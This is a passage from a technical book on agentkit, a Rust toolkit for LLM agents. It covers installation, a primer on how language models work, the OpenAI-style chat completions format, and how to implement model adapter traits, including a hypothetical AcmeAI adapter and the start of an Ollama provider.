
Introduction

This book is a technical guide to building LLM agent applications in Rust. It uses agentkit — a modular toolkit split into small, composable crates — as both the teaching vehicle and a production-ready library you can integrate into your own projects.

It is a progressive walkthrough of the design decisions, trade-offs, and implementation patterns behind a working agent system. By the end, you should be able to:

  • Integrate agentkit into your own applications
  • Understand why each abstraction exists and what alternatives were considered
  • Build your own agent toolkit from scratch if you prefer

What agentkit is

agentkit is a Rust toolkit for building LLM agent applications: coding agents, assistant CLIs, multi-agent orchestration tools, and anything else that runs a model in a loop with tools.

The project is split into small crates behind feature flags. You pull in only what you need. The core loop is runtime-agnostic. Tool crates, MCP integration, and provider adapters add functionality at the edges.

How this book is structured

The book follows the dependency graph of a real agent system, bottom-up:

Part I: The agent loop starts with the fundamental question — what is an agent loop? — and builds up from transcript types through streaming, model adapters, the driver, and interrupt-based control flow. This is the foundation everything else rests on.

Part II: Tools and safety introduces the capability and tool abstraction layers, the permission system, built-in filesystem and shell tools, and how to write your own. Safety is a first-class concern, not an afterthought.

Part III: Context, compaction, and memory covers how agents load project context and how to manage transcript growth through compaction strategies.

Part IV: Integration and extensibility covers MCP server integration, async task management for parallel tool execution, reporting and observability, and provider adapter implementation.

Part V: Building a coding agent ties everything together by walking through the architecture of a complete coding agent — the kind of tool you use every day when you use Claude Code or Codex CLI.

Who this is for

This book assumes you are comfortable with Rust and have a working understanding of async programming. You do not need prior experience with LLM APIs, but familiarity with the basic concept of chat completions (system/user/assistant messages, tool calling) will help.

If you are evaluating agent frameworks, this book will give you enough depth to make an informed decision. If you are building your own agent system, it covers the design constraints you are likely to encounter.

Installation

Requirements

  • Rust 1.88 or later

Adding agentkit to your project

cargo add agentkit

Or add it to your Cargo.toml:

[dependencies]
agentkit = "0.2.2"

Minimal dependency set

By default, agentkit enables: core, capabilities, tools, task-manager, loop, and reporting.

To keep your build lean, disable defaults and pick only what you need:

[dependencies]
agentkit = { version = "0.2.2", default-features = false, features = ["core", "loop"] }

See the Feature flags reference for the full list.

Building from source

git clone https://github.com/danielkov/agentkit.git
cd agentkit
cargo build

Running the examples

The examples use OpenRouter as the model provider. Create a .env file in the repo root:

OPENROUTER_API_KEY=your_key_here
OPENROUTER_MODEL=openrouter/hunter-alpha

Then run any example:

cargo run -p openrouter-chat -- "hello"

The examples are referenced throughout this book. Each chapter points to the relevant example that exercises the concepts being discussed.

How do LLMs even work?

Large Language Models (LLMs) are probabilistic models, typically based on the transformer architecture, trained via gradient-based machine learning to predict the next token in a sequence.

They don’t “think” or maintain persistent memory. During inference, a pre-trained model processes an input sequence and generates output token-by-token. LLMs are stateless across requests, but fully condition on all tokens within the current context window.

Key parameters and concepts:

  • context window size: the maximum number of tokens (input + output) the model can process in a single request. Frontier models can reach ~1M tokens; ~100k–250k is typical for strong models.
  • temperature: controls randomness in token sampling. Lower values bias toward high-probability tokens (more deterministic); higher values increase diversity by allowing lower-probability tokens to be selected.
  • weights and fine-tuning: the model consists of learned parameters (“weights”) arranged in matrices across layers. These encode statistical relationships between tokens. Fine-tuning adjusts these weights to specialise behaviour on specific data or tasks.

Tokenisation

LLMs operate on tokens, not raw text. Tokens are subword units (e.g. “un”, “like”, “ly”).

raw text:      "unlikely"
                   │
            ┌──────┴─────┐
tokens:    [un]  [like] [ly]
            │      │      │
token ids: [348] [2193] [306]

Implications:

  • cost scales with token count, not characters
  • prompt design must consider token efficiency
  • edge cases (code, JSON, whitespace) matter
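The split in the diagram can be reproduced with a toy greedy longest-match tokeniser. The vocabulary here is invented for the example; real tokenisers (BPE, WordPiece) learn theirs from data and handle far more edge cases:

```rust
// Toy greedy longest-match tokeniser. The fixed vocabulary is invented
// purely to illustrate how text maps to subword tokens; real tokenisers
// learn their vocabularies and merge rules from data.
fn tokenize(text: &str, vocab: &[&str]) -> Vec<String> {
    let mut tokens = Vec::new();
    let mut rest = text;
    while !rest.is_empty() {
        // Pick the longest vocabulary entry that prefixes the remaining text.
        let best = vocab
            .iter()
            .filter(|t| rest.starts_with(**t))
            .max_by_key(|t| t.len());
        match best {
            Some(t) => {
                tokens.push((*t).to_string());
                rest = &rest[t.len()..];
            }
            None => {
                // Unknown character: fall back to a single-character token.
                let ch = rest.chars().next().unwrap();
                tokens.push(ch.to_string());
                rest = &rest[ch.len_utf8()..];
            }
        }
    }
    tokens
}

fn main() {
    let vocab = ["un", "like", "ly", "li"];
    let tokens = tokenize("unlikely", &vocab);
    assert_eq!(tokens, vec!["un", "like", "ly"]);
    println!("{tokens:?}"); // ["un", "like", "ly"]
}
```

Note the cost implication: “unlikely” is 8 characters but only 3 tokens; billing and context limits count the 3.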

Next-token prediction

At its core, an LLM repeatedly does:

  1. Encode input tokens into vectors (embeddings)
  2. Pass them through transformer layers (attention + MLPs)
  3. Produce logits (unnormalised probabilities over vocabulary)
  4. Sample/select the next token
  5. Append token and repeat

input: [The] [cat] [sat]
         │     │     │
         ▼     ▼     ▼
┌────────────────────────┐
│      Embedding         │  map token ids → dense vectors
└───────────┬────────────┘
            ▼
┌────────────────────────┐
│  Transformer Layer ×N  │  self-attention + feed-forward
└───────────┬────────────┘
            ▼
┌────────────────────────┐
│   Logits (vocab size)  │  unnormalised scores over all tokens
└───────────┬────────────┘
            ▼
┌────────────────────────┐
│  Sampling / Argmax     │  pick next token
└───────────┬────────────┘
            ▼
           [on]  ← append to sequence, repeat

This loop continues until a stop condition is reached.
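The five steps above can be sketched as a decode loop. The “model” here is a hard-coded bigram lookup, not a transformer; the point is the predict, append, repeat control flow:

```rust
use std::collections::HashMap;

// Stand-in "model": a bigram lookup table instead of a transformer.
// A real model produces logits over a whole vocabulary; here the most
// likely next token is just looked up directly.
fn next_token(prev: &str, table: &HashMap<&str, &str>) -> Option<String> {
    table.get(prev).map(|t| t.to_string())
}

fn main() {
    let table = HashMap::from([
        ("The", "cat"),
        ("cat", "sat"),
        ("sat", "on"),
        ("on", "the"),
        ("the", "mat"),
    ]);

    let mut sequence = vec!["The".to_string()];
    // Decode loop: predict, append, repeat until a stop condition
    // (here: no continuation found, or a length cap).
    while sequence.len() < 6 {
        match next_token(sequence.last().unwrap(), &table) {
            Some(tok) => sequence.push(tok),
            None => break,
        }
    }

    assert_eq!(sequence.join(" "), "The cat sat on the mat");
    println!("{}", sequence.join(" "));
}
```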


Attention (the core primitive)

Transformers rely on self-attention:

  • Every token attends to every other token in the sequence
  • Attention weights determine relevance between tokens

Sequence: [The] [cat] [sat] [on] [the] [___]

Attention from [___] to all previous tokens:

[The]  ░░░░░░░░░░░░░░░░░░             low
[cat]  ████████████████████████████   high  ← subject
[sat]  ██████████████████████         med   ← verb
[on]   ████████████████████████████   high  ← preposition
[the]  ███████████████                med   ← article
                                      ────────────►
                                       attention weight

Intuition: Instead of fixed rules, the model dynamically decides:

“Which previous tokens matter for predicting the next one?”

This is why LLMs can:

  • track long dependencies
  • follow instructions
  • mimic structure (e.g. code, JSON)
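A toy version of this scoring shows the mechanics. The 3-dimensional key and query vectors below are made up for illustration (real models use learned, high-dimensional projections): dot products score each previous token against the query, and softmax turns the scores into weights that sum to 1.

```rust
// Toy single-query attention: score each previous token's key vector
// against the query, then softmax the scores into weights.
fn softmax(scores: &[f64]) -> Vec<f64> {
    // Subtract the max for numerical stability before exponentiating.
    let max = scores.iter().cloned().fold(f64::NEG_INFINITY, f64::max);
    let exps: Vec<f64> = scores.iter().map(|s| (s - max).exp()).collect();
    let sum: f64 = exps.iter().sum();
    exps.iter().map(|e| e / sum).collect()
}

fn dot(a: &[f64], b: &[f64]) -> f64 {
    a.iter().zip(b).map(|(x, y)| x * y).sum()
}

fn main() {
    // Invented key vectors for the previous tokens [The, cat, sat, on, the].
    let keys = [
        vec![0.1, 0.0, 0.2], // The
        vec![0.9, 0.8, 0.1], // cat
        vec![0.6, 0.4, 0.3], // sat
        vec![0.8, 0.9, 0.2], // on
        vec![0.3, 0.2, 0.5], // the
    ];
    // Invented query vector for the position being predicted.
    let query = vec![1.0, 1.0, 0.0];

    let scores: Vec<f64> = keys.iter().map(|k| dot(&query, k)).collect();
    let weights = softmax(&scores);

    // The weights form a probability distribution over previous tokens.
    let total: f64 = weights.iter().sum();
    assert!((total - 1.0).abs() < 1e-9);
    for (tok, w) in ["The", "cat", "sat", "on", "the"].iter().zip(&weights) {
        println!("{tok:>4}: {w:.3}");
    }
}
```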

Sampling controls (beyond temperature)

Temperature is only one lever. Others include:

  • top-k: restrict sampling to the k most likely tokens
  • top-p (nucleus sampling): restrict to smallest set of tokens whose cumulative probability ≥ p
  • frequency / presence penalties: discourage repetition

These directly affect:

  • determinism
  • verbosity
  • hallucination rate

Logits after softmax (probability distribution over vocab):

token   prob     temperature=0.2         temperature=1.0
─────   ─────    ──────────────────      ──────────────────
"mat"   0.45     █████████████████       █████████
"rug"   0.25     ████████░░░░░░░░░       █████
"bed"   0.15     ████░░░░░░░░░░░░░       ███
"hat"   0.10     ██░░░░░░░░░░░░░░░       ██
"sky"   0.05     ░░░░░░░░░░░░░░░░░       █
                 ▲ concentrated          ▲ spread out
                 (nearly deterministic) (more creative)

With top-k=3:    only [mat, rug, bed] are candidates
With top-p=0.85: only [mat, rug, bed] (cumulative 0.85)
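These filters are easy to state in code. The sketch below matches the numbers in the diagram; temperature is applied as p^(1/T) followed by renormalisation, which is mathematically equivalent to scaling logits before softmax:

```rust
// Temperature and top-p applied to the example distribution above.
fn apply_temperature(probs: &[f64], temperature: f64) -> Vec<f64> {
    // p^(1/T) renormalised is equivalent to softmax(logit / T).
    let scaled: Vec<f64> = probs.iter().map(|p| p.powf(1.0 / temperature)).collect();
    let sum: f64 = scaled.iter().sum();
    scaled.iter().map(|p| p / sum).collect()
}

fn top_p_candidates<'a>(tokens: &[(&'a str, f64)], p: f64) -> Vec<&'a str> {
    // Smallest prefix (tokens sorted by descending probability) whose
    // cumulative mass reaches p. The epsilon guards against float error.
    let mut cumulative = 0.0;
    let mut kept = Vec::new();
    for (tok, prob) in tokens {
        kept.push(*tok);
        cumulative += prob;
        if cumulative + 1e-12 >= p {
            break;
        }
    }
    kept
}

fn main() {
    let tokens = [("mat", 0.45), ("rug", 0.25), ("bed", 0.15), ("hat", 0.10), ("sky", 0.05)];
    let probs: Vec<f64> = tokens.iter().map(|(_, p)| *p).collect();

    // Low temperature concentrates mass on the most likely token.
    let cold = apply_temperature(&probs, 0.2);
    assert!(cold[0] > 0.9);

    // top-k = 3 keeps the three most likely tokens.
    let top_k: Vec<&str> = tokens.iter().take(3).map(|(t, _)| *t).collect();
    assert_eq!(top_k, vec!["mat", "rug", "bed"]);

    // top-p = 0.85 keeps [mat, rug, bed] (0.45 + 0.25 + 0.15 = 0.85).
    assert_eq!(top_p_candidates(&tokens, 0.85), vec!["mat", "rug", "bed"]);
}
```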

Why hallucinations happen

LLMs optimise for:

“What token is statistically likely next?”

—not:

“What is true?”

So they will:

  • confidently generate plausible but incorrect information
  • fill gaps when context is missing
  • prefer fluency over factuality

Mitigations:

  • better prompting
  • retrieval (RAG)
  • constrained decoding
  • fine-tuning

Fine-tuning vs prompting vs RAG

Three different levers:

  • prompting: steer behaviour at runtime (cheap, flexible)
  • fine-tuning: modify weights (expensive, persistent)
  • RAG (retrieval-augmented generation): inject external knowledge at inference

Rule of thumb:

  • behaviour → prompt
  • knowledge → RAG
  • style/consistency → fine-tune

Harnesses

To interface with LLMs in practice, we build applications around them, called harnesses. A harness constrains the LLM’s probabilistic behaviour, enhancing it and steering it towards deterministic outcomes.

A good harness has:

  • a loop to feed a continuous conversation into the model
  • configuration options or an interface, for customizing model behaviour
  • observability, to allow users to adjust their inputs based on how the model responds
  • a toolset, to allow the model to perform tasks

┌─────────────────────────────────────────────────┐
│                   Harness                       │
│                                                 │
│   ┌───────────┐    ┌───────────┐    ┌─────────┐ │
│   │  Config   │    │    LLM    │    │  Tools  │ │
│   │ (prompts, │───▶│  (infer)  │───▶│ (act on │ │
│   │  params)  │    │           │    │  world) │ │
│   └───────────┘    └─────┬─────┘    └────┬────┘ │
│                          │               │      │
│                    ┌─────▼───────────────▼───┐  │
│                    │     Conversation loop   │  │
│                    │  (accumulate + re-send) │  │
│                    └────────────┬────────────┘  │
│                                 │               │
│                    ┌────────────▼────────────┐  │
│                    │     Observability       │  │
│                    │  (logs, metrics, traces)│  │
│                    └─────────────────────────┘  │
└─────────────────────────────────────────────────┘

The diagram above describes a chatbot harness — user input in, text out. An agent harness adds a feedback path: when the model’s output contains tool calls, the harness executes them and appends the results to the conversation before the next inference call.

This feedback path makes the harness a loop. The loop introduces several concerns that a single-turn harness does not have:

  • streaming: tokens arrive incrementally, but tool calls must be fully assembled before execution
  • interrupts: users need to be able to abort a loop heading in the wrong direction, and external systems may need to preempt it with urgent events — the loop must support pause, yield, and resume
  • context growth: each tool call and result adds tokens to the transcript, which will eventually exceed the context window
  • concurrency: independent tool calls benefit from parallel execution, but the model needs all results before it can continue
  • safety: the model can request arbitrary actions — the harness must decide which ones to permit

Chat harness (open loop):

  User ──▶ Model ──▶ Text ──▶ User


Agent harness (closed loop):

  User ──▶ Model ──┬──▶ Text ──▶ User
                   │
                   ├──▶ Tool call
                   │       │
                   │    Execute
                   │       │
                   │    Result
                   │       │
                   └───────┘  ← feed back, model continues
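The closed loop above can be sketched end to end with stubs. ToyModel, execute_tool, and the message strings are all invented stand-ins (no streaming, permissions, or real inference); only the control flow mirrors a real agent harness:

```rust
// Minimal closed-loop sketch: call the model, execute any tool call,
// feed the result back, repeat until plain text comes out.
enum ModelOutput {
    Text(String),
    ToolCall { name: String, args: String },
}

struct ToyModel {
    turn: usize,
}

impl ToyModel {
    // Stand-in for an inference call over the whole transcript.
    fn infer(&mut self, _transcript: &[String]) -> ModelOutput {
        self.turn += 1;
        if self.turn == 1 {
            ModelOutput::ToolCall { name: "read_file".into(), args: "src/main.rs".into() }
        } else {
            ModelOutput::Text("The file defines fn main().".into())
        }
    }
}

// Stand-in tool executor.
fn execute_tool(name: &str, args: &str) -> String {
    format!("<contents of {args} via {name}>")
}

fn main() {
    let mut model = ToyModel { turn: 0 };
    let mut transcript = vec!["user: what does src/main.rs do?".to_string()];

    let answer = loop {
        match model.infer(&transcript) {
            // Tool call: execute it, append the result, go around again.
            ModelOutput::ToolCall { name, args } => {
                let result = execute_tool(&name, &args);
                transcript.push(format!("tool: {result}"));
            }
            // Plain text: the loop is done.
            ModelOutput::Text(text) => break text,
        }
    };

    assert_eq!(answer, "The file defines fn main().");
    println!("{answer}");
}
```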

From harness to toolkit

A minimal agent loop is straightforward to implement. Handling all of the above — and composing cleanly into different host applications (a CLI, a web server, a multi-agent system) — requires deliberate decomposition.

agentkit splits the agent harness into independent crates, each responsible for one concern:

Concern                        agentkit crate
───────                        ──────────────
Transcript data model          agentkit-core
Agent loop and driver          agentkit-loop
Tool abstraction               agentkit-tools-core
Filesystem and shell tools     agentkit-tool-fs, agentkit-tool-shell
Permission system              agentkit-capabilities
Context loading                agentkit-context
Transcript compaction          agentkit-compaction
MCP integration                agentkit-mcp
Task management                agentkit-task-manager
Observability                  agentkit-reporting
Provider adapters              agentkit-provider-*

Each crate can be used independently. The core loop is agnostic to the model provider, tool set, and presentation layer. The rest of this book builds up each piece, starting from the loop itself.


Talking to models

Chapter 0 covered how LLMs work internally — tokenisation, attention, sampling. This chapter covers the practical question: how does your code send a transcript to a model and get a response back?

The answer depends on where the model runs and how the provider exposes it. agentkit abstracts over these differences with three traits: ModelAdapter, ModelSession, and ModelTurn. This chapter introduces the traits, builds an adapter from scratch for a hypothetical non-standard API, then shows how agentkit-adapter-completions handles the common case for OpenAI-compatible providers.

Transport: local vs remote

Model providers fall into two categories:

                Local                              Remote
                ─────                              ──────
Where it runs   On your machine                    On provider infra
Transport       HTTP to localhost                  HTTP to provider API
Auth            None required                      API key / OAuth
Resource mgmt   You manage GPU/CPU                 Provider manages scaling
Examples        Ollama, llama.cpp, vLLM, LocalAI   OpenRouter, Anthropic, OpenAI

Both categories use HTTP and the OpenAI-compatible chat completions format (or close variants of it). The differences are in authentication, endpoint URLs, and which features are supported (streaming, tool calling, multimodal inputs).

From an adapter’s perspective, the transport is the same — an HTTP POST with a JSON body. What varies is:

  • authentication: local servers typically need none; remote providers require API keys or headers
  • request schema: most providers follow the OpenAI chat completions shape, with provider-specific extensions
  • response shape: the same choices and message structure, with varying support for tool calls, usage reporting, and reasoning output
  • streaming: some providers return a single JSON response; others stream server-sent events (SSE)

The chat completions format

Most providers (including Ollama, OpenRouter, OpenAI, and many others) speak the same wire format: the OpenAI chat completions API. Understanding this format is essential for adapter work, because the adapter’s job is to translate between it and agentkit’s transcript model.

Request

A chat completion request is a JSON POST body with three key fields:

{
  "model": "llama3.1:8b",
  "messages": [
    { "role": "system", "content": "You are a helpful assistant." },
    { "role": "user", "content": "What is 2 + 2?" }
  ],
  "stream": false
}

The messages array is the transcript. Each message has a role and content. The roles map to agentkit’s ItemKind:

Chat completions role    agentkit ItemKind
─────────────────────    ─────────────────
system                   System, Developer, Context
user                     User
assistant                Assistant
tool                     Tool

When tools are available, the request includes a tools array describing each tool’s name, description, and JSON Schema for its parameters:

{
  "model": "llama3.1:8b",
  "messages": [ ... ],
  "tools": [
    {
      "type": "function",
      "function": {
        "name": "read_file",
        "description": "Read a file from disk",
        "parameters": {
          "type": "object",
          "properties": {
            "path": { "type": "string" }
          },
          "required": ["path"]
        }
      }
    }
  ]
}

Optional fields include temperature, max_completion_tokens, top_p, and provider-specific extensions.

Response (non-streaming)

The response wraps the model’s output in a choices array:

{
  "id": "chatcmpl-abc123",
  "choices": [
    {
      "index": 0,
      "message": {
        "role": "assistant",
        "content": "2 + 2 = 4."
      },
      "finish_reason": "stop"
    }
  ],
  "usage": {
    "prompt_tokens": 25,
    "completion_tokens": 8,
    "total_tokens": 33
  }
}

finish_reason tells you why the model stopped:

finish_reason     Meaning                      agentkit FinishReason
─────────────     ───────                      ─────────────────────
stop              Model finished normally      Completed
tool_calls        Model wants to call tools    ToolCall
length            Hit token limit              MaxTokens
content_filter    Blocked by safety filter     Blocked

When the model calls tools, the message includes a tool_calls array instead of (or alongside) content:

{
  "choices": [
    {
      "message": {
        "role": "assistant",
        "content": null,
        "tool_calls": [
          {
            "id": "call_abc123",
            "type": "function",
            "function": {
              "name": "read_file",
              "arguments": "{\"path\": \"src/main.rs\"}"
            }
          }
        ]
      },
      "finish_reason": "tool_calls"
    }
  ]
}

Note that arguments is a JSON string, not a JSON object — it needs an extra parse step.

To send tool results back, you append messages with role: "tool":

{
  "role": "tool",
  "tool_call_id": "call_abc123",
  "content": "fn main() { ... }"
}
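Putting these pieces together, one complete tool-call round trip produces a messages array like the following (illustrative: the user prompt is invented for the example, while the ids and message shapes match those above):

```json
{
  "model": "llama3.1:8b",
  "messages": [
    { "role": "system", "content": "You are a helpful assistant." },
    { "role": "user", "content": "What does src/main.rs contain?" },
    {
      "role": "assistant",
      "content": null,
      "tool_calls": [
        {
          "id": "call_abc123",
          "type": "function",
          "function": { "name": "read_file", "arguments": "{\"path\": \"src/main.rs\"}" }
        }
      ]
    },
    { "role": "tool", "tool_call_id": "call_abc123", "content": "fn main() { ... }" }
  ]
}
```

The next completion request sends this whole array, so the model sees its own tool call and the result before continuing.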

Streaming (SSE)

When "stream": true, the response is a series of server-sent events. Each event carries a delta (partial content) instead of a complete message:

data: {"choices":[{"delta":{"role":"assistant","content":"2"},"index":0}]}

data: {"choices":[{"delta":{"content":" +"},"index":0}]}

data: {"choices":[{"delta":{"content":" 2"},"index":0}]}

data: {"choices":[{"delta":{"content":" = 4."},"index":0,"finish_reason":"stop"}]}

data: [DONE]

The consumer reassembles the full message by concatenating delta.content chunks. Tool call arguments also stream incrementally. This is where agentkit’s Delta type comes in — it provides a structured representation of these incremental updates. Streaming is covered in detail in a later chapter.
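A deliberately simplified reassembly sketch, sufficient only for the example payloads above (no escaped quotes or multi-line events; a real client would use a proper SSE reader and a JSON parser):

```rust
// Extract the value of the first "content" field from a JSON payload.
// Simplified: assumes no escaped quotes inside the value.
fn extract_content(json: &str) -> Option<&str> {
    let start = json.find("\"content\":\"")? + "\"content\":\"".len();
    let end = json[start..].find('"')? + start;
    Some(&json[start..end])
}

fn main() {
    let events = [
        r#"data: {"choices":[{"delta":{"role":"assistant","content":"2"},"index":0}]}"#,
        r#"data: {"choices":[{"delta":{"content":" +"},"index":0}]}"#,
        r#"data: {"choices":[{"delta":{"content":" 2"},"index":0}]}"#,
        r#"data: {"choices":[{"delta":{"content":" = 4."},"index":0,"finish_reason":"stop"}]}"#,
        "data: [DONE]",
    ];

    let mut message = String::new();
    for event in events {
        // SSE framing: each event line carries a "data: " prefix.
        let payload = event.trim_start_matches("data: ");
        if payload == "[DONE]" {
            break; // end-of-stream sentinel
        }
        if let Some(chunk) = extract_content(payload) {
            message.push_str(chunk);
        }
    }

    assert_eq!(message, "2 + 2 = 4.");
    println!("{message}");
}
```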

What an adapter does with this

An adapter’s job is two translations:

agentkit → provider (request):
  Vec<Item>                         ──▶ messages[]
  Vec<ToolSpec>                     ──▶ tools[]
  SessionConfig / TurnRequest.cache ──▶ auth headers, model field, cache controls

provider → agentkit (response):
  choices[0].message            ──▶ Item { kind: Assistant, parts: [...] }
  choices[0].message.tool_calls ──▶ ToolCallPart per call
  usage                         ──▶ Usage { tokens: TokenUsage { ... } }
  finish_reason                 ──▶ FinishReason

The rest of this chapter shows how these translations map to agentkit’s adapter traits.

The adapter traits

agentkit defines three traits that model the lifecycle of talking to a provider:

ModelAdapter          ModelSession      ModelTurn
────────────          ────────────      ─────────
start_session() ──▶   begin_turn() ──▶  next_event() ──▶ ModelTurnEvent
                      begin_turn() ──▶  next_event() ──▶ ModelTurnEvent
                      begin_turn() ──▶  ...
                                        next_event() ──▶ None (exhausted)

  • ModelAdapter — a factory. It holds configuration (API keys, model name, HTTP client) and produces sessions. It is Send + Sync so it can be shared across threads.
  • ModelSession — a connection-scoped handle. Created once per agent session, it may hold state that persists across turns (e.g. a conversation ID for stateful APIs). Each call to begin_turn() sends the full transcript to the provider and returns a turn.
  • ModelTurn — a streaming response handle. The loop calls next_event() repeatedly until it returns None or a Finished event. For non-streaming providers, all events can be buffered upfront and drained from a queue.

The trait signatures:

#![allow(unused)]
fn main() {
#[async_trait]
pub trait ModelAdapter: Send + Sync {
    type Session: ModelSession;
    async fn start_session(&self, config: SessionConfig) -> Result<Self::Session, LoopError>;
}

#[async_trait]
pub trait ModelSession: Send {
    type Turn: ModelTurn;
    async fn begin_turn(
        &mut self,
        request: TurnRequest,
        cancellation: Option<TurnCancellation>,
    ) -> Result<Self::Turn, LoopError>;
}

#[async_trait]
pub trait ModelTurn: Send {
    async fn next_event(
        &mut self,
        cancellation: Option<TurnCancellation>,
    ) -> Result<Option<ModelTurnEvent>, LoopError>;
}
}

TurnRequest carries everything the provider needs:

#![allow(unused)]
fn main() {
pub struct TurnRequest {
    pub session_id: SessionId,
    pub turn_id: TurnId,
    pub transcript: Vec<Item>,
    pub available_tools: Vec<ToolSpec>,
    pub metadata: MetadataMap,
    pub cache: Option<PromptCacheRequest>,
}
}

ModelTurnEvent is what comes back:

#![allow(unused)]
fn main() {
pub enum ModelTurnEvent {
    Delta(Delta),
    ToolCall(ToolCallPart),
    Usage(Usage),
    Finished(ModelTurnResult),
}
}

Building an adapter from scratch

To see what the traits require, consider a hypothetical model provider that does not use the OpenAI format. Suppose “AcmeAI” has a proprietary REST API:

POST https://api.acme.ai/v1/generate
Authorization: Bearer <token>

{
  "prompt": "What is 2 + 2?",
  "system_instruction": "You are a helpful assistant.",
  "config": { "temperature": 0.5, "max_tokens": 256 }
}

Response:
{
  "text": "2 + 2 = 4.",
  "tokens_used": { "input": 25, "output": 8 },
  "stop_reason": "complete"
}

No messages array. No choices wrapper. No tool_calls. A completely different shape. The adapter must translate to and from it.

Adapter and session

#![allow(unused)]
fn main() {
pub struct AcmeAdapter {
    client: Client,
    api_key: String,
}

pub struct AcmeSession {
    client: Client,
    api_key: String,
}

#[async_trait]
impl ModelAdapter for AcmeAdapter {
    type Session = AcmeSession;

    async fn start_session(&self, _config: SessionConfig) -> Result<AcmeSession, LoopError> {
        Ok(AcmeSession {
            client: self.client.clone(),
            api_key: self.api_key.clone(),
        })
    }
}
}

Turn: the translation layer

begin_turn does the work. It must convert agentkit’s transcript into Acme’s request format and convert the response back into ModelTurnEvents:

#![allow(unused)]
fn main() {
#[async_trait]
impl ModelSession for AcmeSession {
    type Turn = AcmeTurn;

    async fn begin_turn(
        &mut self,
        request: TurnRequest,
        _cancellation: Option<TurnCancellation>,
    ) -> Result<AcmeTurn, LoopError> {
        // Extract the last user message as the prompt.
        // Acme doesn't support multi-turn — flatten the transcript.
        let prompt = request.transcript.iter()
            .rev()
            .find(|item| item.kind == ItemKind::User)
            .and_then(|item| item.parts.first())
            .and_then(|part| match part {
                Part::Text(t) => Some(t.text.clone()),
                _ => None,
            })
            .unwrap_or_default();

        let system = request.transcript.iter()
            .find(|item| item.kind == ItemKind::System)
            .and_then(|item| item.parts.first())
            .and_then(|part| match part {
                Part::Text(t) => Some(t.text.clone()),
                _ => None,
            });

        let body = json!({
            "prompt": prompt,
            "system_instruction": system,
            "config": { "temperature": 0.5, "max_tokens": 256 },
        });

        let resp: AcmeResponse = self.client
            .post("https://api.acme.ai/v1/generate")
            .bearer_auth(&self.api_key)
            .json(&body)
            .send().await
            .map_err(|e| LoopError::Provider(e.to_string()))?
            .json().await
            .map_err(|e| LoopError::Provider(e.to_string()))?;

        // Convert Acme's response into ModelTurnEvents
        let mut events = VecDeque::new();

        events.push_back(ModelTurnEvent::Usage(Usage {
            tokens: Some(TokenUsage {
                input_tokens: resp.tokens_used.input,
                output_tokens: resp.tokens_used.output,
                reasoning_tokens: None,
                cached_input_tokens: None,
            }),
            cost: None,
            metadata: MetadataMap::new(),
        }));

        let output_item = Item {
            id: None,
            kind: ItemKind::Assistant,
            parts: vec![Part::Text(TextPart {
                text: resp.text,
                metadata: MetadataMap::new(),
            })],
            metadata: MetadataMap::new(),
        };

        let finish_reason = match resp.stop_reason.as_str() {
            "complete" => FinishReason::Completed,
            "max_tokens" => FinishReason::MaxTokens,
            other => FinishReason::Other(other.into()),
        };

        events.push_back(ModelTurnEvent::Finished(ModelTurnResult {
            finish_reason,
            output_items: vec![output_item],
            usage: None,
            metadata: MetadataMap::new(),
        }));

        Ok(AcmeTurn { events })
    }
}
}

The turn drain

The turn itself is the same VecDeque pattern used by every non-streaming adapter:

#![allow(unused)]
fn main() {
pub struct AcmeTurn {
    events: VecDeque<ModelTurnEvent>,
}

#[async_trait]
impl ModelTurn for AcmeTurn {
    async fn next_event(
        &mut self,
        _cancellation: Option<TurnCancellation>,
    ) -> Result<Option<ModelTurnEvent>, LoopError> {
        Ok(self.events.pop_front())
    }
}
}

This adapter is complete. It can be passed to Agent::builder().model(adapter) and the loop will call it. The model doesn’t support tool calls, so the loop will always finish after a single turn — but that’s a limitation of Acme’s API, not of the adapter.

The key takeaway: you can integrate any model provider by implementing the three traits. The translation is manual — you map the provider’s request/response format to agentkit’s Item/Part/Usage/FinishReason types. There is no requirement that the provider speaks OpenAI’s format.

The completions adapter

Most providers do speak the OpenAI chat completions format. Implementing the full translation for each one — transcript conversion, multimodal content encoding, tool call parsing, cancellation, error handling — is repetitive. The agentkit-adapter-completions crate handles all of it once.

Instead of implementing ModelAdapter / ModelSession / ModelTurn directly, a provider implements CompletionsProvider:

#![allow(unused)]
fn main() {
pub trait CompletionsProvider: Send + Sync + Clone {
    /// Strongly-typed request config (model, temperature, etc.).
    /// Serialised and merged into the request body.
    type Config: Serialize + Clone + Send + Sync;

    fn provider_name(&self) -> &str;
    fn endpoint_url(&self) -> &str;
    fn config(&self) -> &Self::Config;

    // Hooks — defaults pass through unchanged:
    fn preprocess_request(&self, builder: reqwest::RequestBuilder) -> reqwest::RequestBuilder { builder }
    fn preprocess_response(&self, _status: StatusCode, _body: &str) -> Result<(), LoopError> { Ok(()) }
    fn postprocess_response(&self, _usage: &mut Option<Usage>, _metadata: &mut MetadataMap, _raw: &Value) {}
}
}

The generic CompletionsAdapter<P> implements ModelAdapter and handles:

  • Converting Vec<Item> to the messages array (all ItemKind and Part variants)
  • Serialising P::Config and merging it into the request body
  • Converting Vec<ToolSpec> to the tools array
  • Parsing the response into ModelTurnEvents (text, tool calls, reasoning, usage, finish reason)
  • Encoding multimodal content (images as image_url, audio as input_audio)
  • Racing the HTTP future against the cancellation handle

┌────────────────────────────────────────────────────────────┐
│  CompletionsAdapter<P>                                     │
│                                                            │
│  ┌────────────────────────┐  ┌──────────────────────────┐  │
│  │ P: CompletionsProvider │  │ request.rs / response.rs │  │
│  │ (endpoint, config,     │  │ (transcript conversion,  │  │
│  │  pre/post hooks)       │  │  response parsing)       │  │
│  └────────────────────────┘  └──────────────────────────┘  │
│                                                            │
│  Implements ModelAdapter ──▶ ModelSession ──▶ ModelTurn    │
└────────────────────────────────────────────────────────────┘

The Config associated type is generic because request parameters differ across providers — and sometimes across models within the same provider. Ollama uses num_predict where OpenAI uses max_completion_tokens. Mistral uses max_tokens. Some providers support top_k, others don’t. Making this a provider-defined Serialize struct means each provider declares exactly the parameters it supports, with their correct field names, and gets compile-time validation and IDE completion. The adapter serialises the struct and merges it into the request body:

#![allow(unused)]
fn main() {
// In the adapter's request builder:
let config_value = serde_json::to_value(provider.config())?;
if let Value::Object(fields) = config_value {
    for (key, value) in fields {
        body.insert(key, value);
    }
}
}


Building an Ollama provider

Ollama exposes an OpenAI-compatible endpoint at http://localhost:11434/v1/chat/completions. Using agentkit-adapter-completions, the entire provider is a config struct, a request config struct, and a CompletionsProvider impl.

Configuration

The user-facing config holds connection and inference parameters:

#![allow(unused)]
fn main() {
pub struct OllamaConfig {
    pub model: String,
